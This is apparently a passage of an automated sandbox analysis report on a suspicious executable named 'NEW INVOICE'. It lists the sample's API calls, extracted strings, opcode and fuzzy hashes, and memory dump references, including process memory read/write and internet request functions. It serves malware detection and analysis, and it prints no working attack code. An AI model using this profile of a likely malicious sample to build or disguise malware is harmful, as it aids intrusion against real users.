                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                    • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                    • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                    • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                    APIs
                                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                    • __freefls@4.LIBCMT ref: 00414135
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                    • String ID:
                                                                                    • API String ID: 132634196-0
                                                                                    • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                    • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                    • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                    • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                    APIs
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                    • __getptd_noexit.LIBCMT ref: 00415620
                                                                                    • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                    • __freeptd.LIBCMT ref: 0041563B
                                                                                    • ExitThread.KERNEL32 ref: 00415643
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 3798957060-0
                                                                                    • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                    • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                    • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                    • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                    APIs
                                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                    • String ID:
                                                                                    • API String ID: 1537469427-0
                                                                                    • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                    • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                    • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                    • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _malloc
                                                                                    • String ID: Default$|k
                                                                                    • API String ID: 1579825452-2254895183
                                                                                    • Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                                    • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                    • Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                                    • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                    APIs
                                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                    • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                    • CoUninitialize.OLE32 ref: 0046CE50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 886957087-24824748
                                                                                    • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                    • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                    • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                    • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 176396367-557222456
                                                                                    • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                    • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                    • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                    • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                    APIs
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCopyInit_malloc
                                                                                    • String ID: 4RH
                                                                                    • API String ID: 2981388473-749298218
                                                                                    • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                    • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                    • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                    • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                    APIs
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                    • String ID: LPT$HH
                                                                                    • API String ID: 3035604524-2728063697
                                                                                    • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                    • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                    • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                    • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                    APIs
                                                                                      • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                      • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4055202900-2766056989
                                                                                    • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                    • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                    • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                    • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset_wcslen
                                                                                    • String ID: |
                                                                                    • API String ID: 915713708-2343686810
                                                                                    • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                    • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                    • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                    • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                    • HttpQueryInfoW.WININET ref: 0044A892
                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3705125965-3916222277
                                                                                    • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                    • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                    • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                    • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                    • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                    • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                    • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                    • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: AU3_GetPluginDetails
                                                                                    • API String ID: 145871493-4132174516
                                                                                    • Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                                    • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                    • Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                                    • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 3375834691-2298589950
                                                                                    • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                    • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                    • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                    • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                    • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                    • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                    • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
